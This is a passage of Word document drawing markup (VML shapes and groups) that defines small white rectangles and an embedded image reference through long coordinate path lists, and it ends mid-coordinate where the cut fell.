        <v:shape style="position:absolute;left:6990;top:7470;width:130;height:270" coordorigin="6990,7470" coordsize="130,270" path="m7003,7498l7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7003,7498,7004,7498,7004,7498,7004,7498,7004,7498,7004,7498,7004,7498,7004,7498,7005,7498,7005,7498,7005,7498,7005,7498,7006,7498,7006,7498,7006,7498,7006,7498,7007,7498,7007,7498,7007,7498,7008,7498,7008,7498,7009,7498,7009,7498,7009,7498,7010,7498,7010,7498,7011,7498,7011,7498,7012,7498,7013,7498,7013,7498,7014,7498,7014,7498,7015,7498,7016,7498,7016,7498,7017,7498,7018,7498,7019,7498,7020,7498,7020,7498,7021,7498,7022,7498,7023,7498,7024,7498,7025,7498,7026,7498,7027,7498,7028,7498,7029,7498,7030,7498,7031,7498,7033,7498,7034,7498,7035,7498,7036,7498,7038,7498,7039,7498,7040,7498,7042,7498,7043,7498,7045,7498,7046,7498,7048,7498,7049,7498,7051,7498,7053,7498,7054,7498,7056,7498,7058,7498,7060,7498,7062,7498,7064,7498,7066,7498,7068,7498,7070,7498,7072,7498,7074,7498,7076,7498,7078,7498,7080,7498,7083,7498,7085,7498,7087,7498,7090,7498,7092,7498,7095,7498,7097,7498,7100,7498,7103,7498,7105,7498,7108,7498,7111,7498,7114,7498,7117,7498,7120,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7499,7123,7499,7123,7499,7123,7499,7123,7499,7123,7499,7123,7500,7123,7500,7123,7500,7123,7500,7123,7501,7123,7501,7123,7501,7123,7502,7123,7502,7123,7503,7123,7503,7123,7504,7123,7504,7123,7505,7123,7505,7123,7506,7123,7507,7123,7507,7123,7508,7123,7509,7123,7510,7123,7511,7123,7512,7123,7513,7123,7513,7123,7515,7123,7516,7123,7517,7123,7518,7123,7519,7123,7520,7123,7522,7123,7523,7123,7524,7123,7526,7123,7527,7123,7529,7123,7530,7123,7532,7123,7534,7123,7536,7123,7537,7123,7539,7123,7541,7123,7543,7123,7545,7123,7548,7123,7550,7123,7552,7123,7554,7123,7557,7123,7559,7123,7562,7123,7564,7123,7567,7123,7570,7123,7572,7123,7575,7123,7578,7123,7581,7123,7584,7123,7588,7123,7591,7123,7594,7123,7597,7123,7601,7123,7605,7123,7608,7123,7612,7123,7616,7123,7620,7123,7624,7123,7628,7123,7632,7123,7636,7123,7640,7123,7645,7123,7649,7123,7654,7123,7658,7123,7663,7123,7668,7123,7673,7123,7678,7123,7683,7123,7688,7123,7694,7123,7699,7123,7705,7123,7710,7123,7716,7123,7722,7123,7728,7123,7734,7123,7740,7123,7747,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7122,7753,7121,7753,7121,7753,7121,7753,7121,7753,7121,7753,7121,7753,7120,7753,7120,7753,7120,7753,7120,7753,7120,7753,7119,7753,7119,7753,7119,7753,7118,7753,7118,7753,7118,7753,7117,7753,7117,7753,7117,7753,7116,7753,7116,7753,7115,7753,7115,7753,7114,7753,7114,7753,7113,7753,7113,7753,7112,7753,7111,7753,7111,7753,7110,7753,7109,7753,7109,7753,7108,7753,7107,7753,7106,7753,7106,7753,7105,7753,7104,7753,7103,7753,7102,7753,7101,7753,7100,7753,7099,7753,7098,7753,7097,7753,7096,7753,7095,7753,7094,7753,7093,7753,7091,7753,7090,7753,7089,7753,7087,7753,7086,7753,7085,7753,7083,7753,7082,7753,7080,7753,7079,7753,7077,7753,7076,7753,7074,7753,7072,7753,7071,7753,7069,7753,7067,7753,7065,7753,7063,7753,7062,7753,7060,7753,7058,7753,7056,7753,7053,7753,7051,7753,7049,7753,7047,7753,7045,7753,7042,7753,7040,7753,7038,7753,7035,7753,7033,7753,7030,7753,7028,7753,7025,7753,7022,7753,7020,7753,7017,7753,7014,7753,7011,7753,7008,7753,7006,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7753,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7752,7003,7751,7003,7751,7003,7751,7003,7751,7003,7750,7003,7750,7003,7750,7003,7749,7003,7749,7003,7748,7003,7748,7003,7747,7003,7747,7003,7746,7003,7746,7003,7745,7003,7745,7003,7744,7003,7743,7003,7742,7003,7742,7003,7741,7003,7740,7003,7739,7003,7738,7003,7737,7003,7736,7003,7735,7003,7734,7003,7733,7003,7732,7003,7730,7003,7729,7003,7728,7003,7726,7003,7725,7003,7723,7003,7722,7003,7720,7003,7719,7003,7717,7003,7715,7003,7713,7003,7711,7003,7709,7003,7707,7003,7705,7003,7703,7003,7701,7003,7699,7003,7696,7003,7694,7003,7692,7003,7689,7003,7686,7003,7684,7003,7681,7003,7678,7003,7675,7003,7672,7003,7669,7003,7666,7003,7663,7003,7660,7003,7657,7003,7653,7003,7650,7003,7646,7003,7643,7003,7639,7003,7635,7003,7631,7003,7627,7003,7623,7003,7619,7003,7615,7003,7610,7003,7606,7003,7602,7003,7597,7003,7592,7003,7587,7003,7583,7003,7578,7003,7573,7003,7567,7003,7562,7003,7557,7003,7551,7003,7546,7003,7540,7003,7534,7003,7529,7003,7523,7003,7517,7003,7510,7003,7504,7003,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:355.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="7110,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:7110;top:7470;width:130;height:270" coordorigin="7110,7470" coordsize="130,270" path="m7123,7498l7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7123,7498,7124,7498,7124,7498,7124,7498,7124,7498,7124,7498,7124,7498,7125,7498,7125,7498,7125,7498,7125,7498,7125,7498,7126,7498,7126,7498,7126,7498,7126,7498,7127,7498,7127,7498,7127,7498,7128,7498,7128,7498,7129,7498,7129,7498,7130,7498,7130,7498,7130,7498,7131,7498,7131,7498,7132,7498,7133,7498,7133,7498,7134,7498,7134,7498,7135,7498,7136,7498,7136,7498,7137,7498,7138,7498,7139,7498,7140,7498,7140,7498,7141,7498,7142,7498,7143,7498,7144,7498,7145,7498,7146,7498,7147,7498,7148,7498,7149,7498,7150,7498,7151,7498,7153,7498,7154,7498,7155,7498,7156,7498,7158,7498,7159,7498,7160,7498,7162,7498,7163,7498,7165,7498,7166,7498,7168,7498,7170,7498,7171,7498,7173,7498,7175,7498,7176,7498,7178,7498,7180,7498,7182,7498,7184,7498,7186,7498,7188,7498,7190,7498,7192,7498,7194,7498,7196,7498,7198,7498,7200,7498,7203,7498,7205,7498,7207,7498,7210,7498,7212,7498,7215,7498,7217,7498,7220,7498,7223,7498,7225,7498,7228,7498,7231,7498,7234,7498,7237,7498,7240,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7498,7243,7499,7243,7499,7243,7499,7243,7499,7243,7499,7243,7499,7243,7500,7243,7500,7243,7500,7243,7500,7243,7501,7243,7501,7243,7501,7243,7502,7243,7502,7243,7503,7243,7503,7243,7504,7243,7504,7243,7505,7243,7505,7243,7506,7243,7507,7243,7507,7243,7508,7243,7509,7243,7510,7243,7511,7243,7512,7243,7513,7243,7513,7243,7515,7243,7516,7243,7517,7243,7518,7243,7519,7243,7520,7243,7522,7243,7523,7243,7524,7243,7526,7243,7527,7243,7529,7243,7530,7243,7532,7243,7534,7243,7536,7243,7537,7243,7539,7243,7541,7243,7543,7243,7545,7243,7548,7243,7550,7243,7552,7243,7554,7243,7557,7243,7559,7243,7562,7243,7564,7243,7567,7243,7570,7243,7572,7243,7575,7243,7578,7243,7581,7243,7584,7243,7588,7243,7591,7243,7594,7243,7597,7243,7601,7243,7605,7243,7608,7243,7612,7243,7616,7243,7620,7243,7624,7243,7628,7243,7632,7243,7636,7243,7640,7243,7645,7243,7649,7243,7654,7243,7658,7243,7663,7243,7668,7243,7673,7243,7678,7243,7683,7243,7688,7243,7694,7243,7699,7243,7705,7243,7710,7243,7716,7243,7722,7243,7728,7243,7734,7243,7740,7243,7747,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7243,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7242,7753,7241,7753,7241,7753,7241,7753,7241,7753,7241,7753,7241,7753,7240,7753,7240,7753,7240,7753,7240,7753,7239,7753,7239,7753,7239,7753,7238,7753,7238,7753,7238,7753,7237,7753,7237,7753,7237,7753,7236,7753,7236,7753,7235,7753,7235,7753,7234,7753,7234,7753,7233,7753,7233,7753,7232,7753,7231,7753,7231,7753,7230,7753,7229,7753,7229,7753,7228,7753,7227,7753,7226,7753,7226,7753,7225,7753,7224,7753,7223,7753,7222,7753,7221,7753,7220,7753,7219,7753,7218,7753,7217,7753,7216,7753,7215,7753,7214,7753,7213,7753,7211,7753,7210,7753,7209,7753,7208,7753,7206,7753,7205,7753,7203,7753,7202,7753,7200,7753,7199,7753,7197,7753,7196,7753,7194,7753,7192,7753,7191,7753,7189,7753,7187,7753,7185,7753,7183,7753,7182,7753,7180,7753,7178,7753,7176,7753,7174,7753,7171,7753,7169,7753,7167,7753,7165,7753,7163,7753,7160,7753,7158,7753,7155,7753,7153,7753,7150,7753,7148,7753,7145,7753,7143,7753,7140,7753,7137,7753,7134,7753,7131,7753,7129,7753,7126,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7753,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7752,7123,7751,7123,7751,7123,7751,7123,7751,7123,7750,7123,7750,7123,7750,7123,7749,7123,7749,7123,7748,7123,7748,7123,7747,7123,7747,7123,7746,7123,7746,7123,7745,7123,7745,7123,7744,7123,7743,7123,7742,7123,7742,7123,7741,7123,7740,7123,7739,7123,7738,7123,7737,7123,7736,7123,7735,7123,7734,7123,7733,7123,7732,7123,7730,7123,7729,7123,7728,7123,7726,7123,7725,7123,7723,7123,7722,7123,7720,7123,7719,7123,7717,7123,7715,7123,7713,7123,7711,7123,7709,7123,7707,7123,7705,7123,7703,7123,7701,7123,7699,7123,7696,7123,7694,7123,7692,7123,7689,7123,7686,7123,7684,7123,7681,7123,7678,7123,7675,7123,7672,7123,7669,7123,7666,7123,7663,7123,7660,7123,7657,7123,7653,7123,7650,7123,7646,7123,7643,7123,7639,7123,7635,7123,7631,7123,7627,7123,7623,7123,7619,7123,7615,7123,7610,7123,7606,7123,7602,7123,7597,7123,7592,7123,7587,7123,7583,7123,7578,7123,7573,7123,7567,7123,7562,7123,7557,7123,7551,7123,7546,7123,7540,7123,7534,7123,7529,7123,7523,7123,7517,7123,7510,7123,7504,7123,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:493.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9870,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:9870;top:7470;width:130;height:270" coordorigin="9870,7470" coordsize="130,270" path="m9884,7498l9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9884,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9885,7498,9886,7498,9886,7498,9886,7498,9886,7498,9886,7498,9887,7498,9887,7498,9887,7498,9887,7498,9888,7498,9888,7498,9888,7498,9889,7498,9889,7498,9889,7498,9890,7498,9890,7498,9890,7498,9891,7498,9891,7498,9892,7498,9892,7498,9893,7498,9893,7498,9894,7498,9895,7498,9895,7498,9896,7498,9896,7498,9897,7498,9898,7498,9899,7498,9899,7498,9900,7498,9901,7498,9902,7498,9903,7498,9904,7498,9904,7498,9905,7498,9906,7498,9907,7498,9908,7498,9909,7498,9911,7498,9912,7498,9913,7498,9914,7498,9915,7498,9917,7498,9918,7498,9919,7498,9920,7498,9922,7498,9923,7498,9925,7498,9926,7498,9928,7498,9929,7498,9931,7498,9933,7498,9934,7498,9936,7498,9938,7498,9939,7498,9941,7498,9943,7498,9945,7498,9947,7498,9949,7498,9951,7498,9953,7498,9955,7498,9957,7498,9960,7498,9962,7498,9964,7498,9966,7498,9969,7498,9971,7498,9974,7498,9976,7498,9979,7498,9981,7498,9984,7498,9987,7498,9990,7498,9992,7498,9995,7498,9998,7498,10001,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7499,10004,7499,10004,7499,10004,7499,10004,7499,10004,7499,10004,7500,10004,7500,10004,7500,10004,7500,10004,7501,10004,7501,10004,7501,10004,7502,10004,7502,10004,7503,10004,7503,10004,7504,10004,7504,10004,7505,10004,7505,10004,7506,10004,7507,10004,7507,10004,7508,10004,7509,10004,7510,10004,7511,10004,7512,10004,7513,10004,7513,10004,7515,10004,7516,10004,7517,10004,7518,10004,7519,10004,7520,10004,7522,10004,7523,10004,7524,10004,7526,10004,7527,10004,7529,10004,7530,10004,7532,10004,7534,10004,7536,10004,7537,10004,7539,10004,7541,10004,7543,10004,7545,10004,7548,10004,7550,10004,7552,10004,7554,10004,7557,10004,7559,10004,7562,10004,7564,10004,7567,10004,7570,10004,7572,10004,7575,10004,7578,10004,7581,10004,7584,10004,7588,10004,7591,10004,7594,10004,7597,10004,7601,10004,7605,10004,7608,10004,7612,10004,7616,10004,7620,10004,7624,10004,7628,10004,7632,10004,7636,10004,7640,10004,7645,10004,7649,10004,7654,10004,7658,10004,7663,10004,7668,10004,7673,10004,7678,10004,7683,10004,7688,10004,7694,10004,7699,10004,7705,10004,7710,10004,7716,10004,7722,10004,7728,10004,7734,10004,7740,10004,7747,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10003,7753,10002,7753,10002,7753,10002,7753,10002,7753,10002,7753,10001,7753,10001,7753,10001,7753,10001,7753,10000,7753,10000,7753,10000,7753,9999,7753,9999,7753,9999,7753,9998,7753,9998,7753,9998,7753,9997,7753,9997,7753,9996,7753,9996,7753,9995,7753,9995,7753,9994,7753,9993,7753,9993,7753,9992,7753,9992,7753,9991,7753,9990,7753,9989,7753,9989,7753,9988,7753,9987,7753,9986,7753,9985,7753,9984,7753,9984,7753,9983,7753,9982,7753,9981,7753,9980,7753,9979,7753,9977,7753,9976,7753,9975,7753,9974,7753,9973,7753,9972,7753,9970,7753,9969,7753,9968,7753,9966,7753,9965,7753,9963,7753,9962,7753,9960,7753,9959,7753,9957,7753,9955,7753,9954,7753,9952,7753,9950,7753,9949,7753,9947,7753,9945,7753,9943,7753,9941,7753,9939,7753,9937,7753,9935,7753,9933,7753,9931,7753,9928,7753,9926,7753,9924,7753,9922,7753,9919,7753,9917,7753,9914,7753,9912,7753,9909,7753,9907,7753,9904,7753,9901,7753,9898,7753,9896,7753,9893,7753,9890,7753,9887,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7753,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7752,9884,7751,9884,7751,9884,7751,9884,7751,9884,7750,9884,7750,9884,7750,9884,7749,9884,7749,9884,7748,9884,7748,9884,7747,9884,7747,9884,7746,9884,7746,9884,7745,9884,7745,9884,7744,9884,7743,9884,7742,9884,7742,9884,7741,9884,7740,9884,7739,9884,7738,9884,7737,9884,7736,9884,7735,9884,7734,9884,7733,9884,7732,9884,7730,9884,7729,9884,7728,9884,7726,9884,7725,9884,7723,9884,7722,9884,7720,9884,7719,9884,7717,9884,7715,9884,7713,9884,7711,9884,7709,9884,7707,9884,7705,9884,7703,9884,7701,9884,7699,9884,7696,9884,7694,9884,7692,9884,7689,9884,7686,9884,7684,9884,7681,9884,7678,9884,7675,9884,7672,9884,7669,9884,7666,9884,7663,9884,7660,9884,7657,9884,7653,9884,7650,9884,7646,9884,7643,9884,7639,9884,7635,9884,7631,9884,7627,9884,7623,9884,7619,9884,7615,9884,7610,9884,7606,9884,7602,9884,7597,9884,7592,9884,7587,9884,7583,9884,7578,9884,7573,9884,7567,9884,7562,9884,7557,9884,7551,9884,7546,9884,7540,9884,7534,9884,7529,9884,7523,9884,7517,9884,7510,9884,7504,9884,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:499.500pt;margin-top:373.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="9990,7470" coordsize="130,270">
        <v:shape style="position:absolute;left:9990;top:7470;width:130;height:270" coordorigin="9990,7470" coordsize="130,270" path="m10004,7498l10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10004,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10005,7498,10006,7498,10006,7498,10006,7498,10006,7498,10006,7498,10007,7498,10007,7498,10007,7498,10007,7498,10008,7498,10008,7498,10008,7498,10009,7498,10009,7498,10009,7498,10010,7498,10010,7498,10011,7498,10011,7498,10011,7498,10012,7498,10012,7498,10013,7498,10013,7498,10014,7498,10015,7498,10015,7498,10016,7498,10017,7498,10017,7498,10018,7498,10019,7498,10019,7498,10020,7498,10021,7498,10022,7498,10023,7498,10024,7498,10025,7498,10025,7498,10026,7498,10027,7498,10028,7498,10030,7498,10031,7498,10032,7498,10033,7498,10034,7498,10035,7498,10037,7498,10038,7498,10039,7498,10041,7498,10042,7498,10043,7498,10045,7498,10046,7498,10048,7498,10049,7498,10051,7498,10053,7498,10054,7498,10056,7498,10058,7498,10060,7498,10061,7498,10063,7498,10065,7498,10067,7498,10069,7498,10071,7498,10073,7498,10075,7498,10077,7498,10080,7498,10082,7498,10084,7498,10087,7498,10089,7498,10091,7498,10094,7498,10096,7498,10099,7498,10101,7498,10104,7498,10107,7498,10110,7498,10112,7498,10115,7498,10118,7498,10121,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7498,10124,7499,10124,7499,10124,7499,10124,7499,10124,7499,10124,7499,10124,7500,10124,7500,10124,7500,10124,7500,10124,7501,10124,7501,10124,7501,10124,7502,10124,7502,10124,7503,10124,7503,10124,7504,10124,7504,10124,7505,10124,7505,10124,7506,10124,7507,10124,7507,10124,7508,10124,7509,10124,7510,10124,7511,10124,7512,10124,7513,10124,7513,10124,7515,10124,7516,10124,7517,10124,7518,10124,7519,10124,7520,10124,7522,10124,7523,10124,7524,10124,7526,10124,7527,10124,7529,10124,7530,10124,7532,10124,7534,10124,7536,10124,7537,10124,7539,10124,7541,10124,7543,10124,7545,10124,7548,10124,7550,10124,7552,10124,7554,10124,7557,10124,7559,10124,7562,10124,7564,10124,7567,10124,7570,10124,7572,10124,7575,10124,7578,10124,7581,10124,7584,10124,7588,10124,7591,10124,7594,10124,7597,10124,7601,10124,7605,10124,7608,10124,7612,10124,7616,10124,7620,10124,7624,10124,7628,10124,7632,10124,7636,10124,7640,10124,7645,10124,7649,10124,7654,10124,7658,10124,7663,10124,7668,10124,7673,10124,7678,10124,7683,10124,7688,10124,7694,10124,7699,10124,7705,10124,7710,10124,7716,10124,7722,10124,7728,10124,7734,10124,7740,10124,7747,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10124,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10123,7753,10122,7753,10122,7753,10122,7753,10122,7753,10122,7753,10121,7753,10121,7753,10121,7753,10120,7753,10120,7753,10120,7753,10120,7753,10119,7753,10119,7753,10118,7753,10118,7753,10118,7753,10117,7753,10117,7753,10116,7753,10116,7753,10115,7753,10115,7753,10114,7753,10113,7753,10113,7753,10112,7753,10112,7753,10111,7753,10110,7753,10109,7753,10109,7753,10108,7753,10107,7753,10106,7753,10105,7753,10105,7753,10104,7753,10103,7753,10102,7753,10101,7753,10100,7753,10099,7753,10098,7753,10096,7753,10095,7753,10094,7753,10093,7753,10092,7753,10090,7753,10089,7753,10088,7753,10086,7753,10085,7753,10083,7753,10082,7753,10080,7753,10079,7753,10077,7753,10076,7753,10074,7753,10072,7753,10070,7753,10069,7753,10067,7753,10065,7753,10063,7753,10061,7753,10059,7753,10057,7753,10055,7753,10053,7753,10051,7753,10048,7753,10046,7753,10044,7753,10042,7753,10039,7753,10037,7753,10034,7753,10032,7753,10029,7753,10027,7753,10024,7753,10021,7753,10019,7753,10016,7753,10013,7753,10010,7753,10007,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7753,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7752,10004,7751,10004,7751,10004,7751,10004,7751,10004,7750,10004,7750,10004,7750,10004,7749,10004,7749,10004,7748,10004,7748,10004,7747,10004,7747,10004,7746,10004,7746,10004,7745,10004,7745,10004,7744,10004,7743,10004,7742,10004,7742,10004,7741,10004,7740,10004,7739,10004,7738,10004,7737,10004,7736,10004,7735,10004,7734,10004,7733,10004,7732,10004,7730,10004,7729,10004,7728,10004,7726,10004,7725,10004,7723,10004,7722,10004,7720,10004,7719,10004,7717,10004,7715,10004,7713,10004,7711,10004,7709,10004,7707,10004,7705,10004,7703,10004,7701,10004,7699,10004,7696,10004,7694,10004,7692,10004,7689,10004,7686,10004,7684,10004,7681,10004,7678,10004,7675,10004,7672,10004,7669,10004,7666,10004,7663,10004,7660,10004,7657,10004,7653,10004,7650,10004,7646,10004,7643,10004,7639,10004,7635,10004,7631,10004,7627,10004,7623,10004,7619,10004,7615,10004,7610,10004,7606,10004,7602,10004,7597,10004,7592,10004,7587,10004,7583,10004,7578,10004,7573,10004,7567,10004,7562,10004,7557,10004,7551,10004,7546,10004,7540,10004,7534,10004,7529,10004,7523,10004,7517,10004,7510,10004,7504,10004,7498e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:468.600pt;width:467.400pt;height:102.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId25" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:97.500pt;margin-top:632.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1950,12650" coordsize="130,250">
        <v:shape style="position:absolute;left:1950;top:12650;width:130;height:250" coordorigin="1950,12650" coordsize="130,250" path="m1975,12660l1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1975,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1976,12660,1977,12660,1977,12660,1977,12660,1977,12660,1977,12660,1978,12660,1978,12660,1978,12660,1978,12660,1979,12660,1979,12660,1979,12660,1980,12660,1980,12660,1980,12660,1981,12660,1981,12660,1981,12660,1982,12660,1982,12660,1983,12660,1983,12660,1984,12660,1984,12660,1985,12660,1986,12660,1986,12660,1987,12660,1988,12660,1988,12660,1989,12660,1990,12660,1990,12660,1991,12660,1992,12660,1993,12660,1994,12660,1995,12660,1995,12660,1996,12660,1997,12660,1998,12660,1999,12660,2000,12660,2002,12660,2003,12660,2004,12660,2005,12660,2006,12660,2008,12660,2009,12660,2010,12660,2011,12660,2013,12660,2014,12660,2016,12660,2017,12660,2019,12660,2020,12660,2022,12660,2024,12660,2025,12660,2027,12660,2029,12660,2030,12660,2032,12660,2034,12660,2036,12660,2038,12660,2040,12660,2042,12660,2044,12660,2046,12660,2048,12660,2051,12660,2053,12660,2055,12660,2057,12660,2060,12660,2062,12660,2065,12660,2067,12660,2070,12660,2072,12660,2075,12660,2078,12660,2081,12660,2083,12660,2086,12660,2089,12660,2092,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12660,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12661,2095,12662,2095,12662,2095,12662,2095,12662,2095,12662,2095,12663,2095,12663,2095,12663,2095,12664,2095,12664,2095,12664,2095,12665,2095,12665,2095,12666,2095,12666,2095,12667,2095,12667,2095,12668,2095,12669,2095,12669,2095,12670,2095,12671,2095,12672,2095,12672,2095,12673,2095,12674,2095,12675,2095,12676,2095,12677,2095,12678,2095,12679,2095,12680,2095,12682,2095,12683,2095,12684,2095,12686,2095,12687,2095,12688,2095,12690,2095,12691,2095,12693,2095,12695,2095,12696,2095,12698,2095,12700,2095,12702,2095,12704,2095,12706,2095,12708,2095,12710,2095,12712,2095,12715,2095,12717,2095,12719,2095,12722,2095,12724,2095,12727,2095,12729,2095,12732,2095,12735,2095,12738,2095,12741,2095,12744,2095,12747,2095,12750,2095,12753,2095,12757,2095,12760,2095,12764,2095,12767,2095,12771,2095,12774,2095,12778,2095,12782,2095,12786,2095,12790,2095,12794,2095,12799,2095,12803,2095,12807,2095,12812,2095,12816,2095,12821,2095,12826,2095,12831,2095,12836,2095,12841,2095,12846,2095,12851,2095,12856,2095,12862,2095,12867,2095,12873,2095,12879,2095,12885,2095,12891,2095,12897,2095,12903,2095,12909,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2095,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2094,12916,2093,12916,2093,12916,2093,12916,2093,12916,2093,12916,2092,12916,2092,12916,2092,12916,2092,12916,2091,12916,2091,12916,2091,12916,2090,12916,2090,12916,2090,12916,2089,12916,2089,12916,2089,12916,2088,12916,2088,12916,2087,12916,2087,12916,2086,12916,2086,12916,2085,12916,2084,12916,2084,12916,2083,12916,2083,12916,2082,12916,2081,12916,2080,12916,2080,12916,2079,12916,2078,12916,2077,12916,2076,12916,2075,12916,2075,12916,2074,12916,2073,12916,2072,12916,2071,12916,2070,12916,2068,12916,2067,12916,2066,12916,2065,12916,2064,12916,2063,12916,2061,12916,2060,12916,2059,12916,2057,12916,2056,12916,2054,12916,2053,12916,2051,12916,2050,12916,2048,12916,2047,12916,2045,12916,2043,12916,2041,12916,2040,12916,2038,12916,2036,12916,2034,12916,2032,12916,2030,12916,2028,12916,2026,12916,2024,12916,2022,12916,2019,12916,2017,12916,2015,12916,2013,12916,2010,12916,2008,12916,2005,12916,2003,12916,2000,12916,1998,12916,1995,12916,1992,12916,1990,12916,1987,12916,1984,12916,1981,12916,1978,12916,1975,12916,1975,12916,1975,12916,1975,12916,1975,12916,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12915,1975,12914,1975,12914,1975,12914,1975,12914,1975,12914,1975,12913,1975,12913,1975,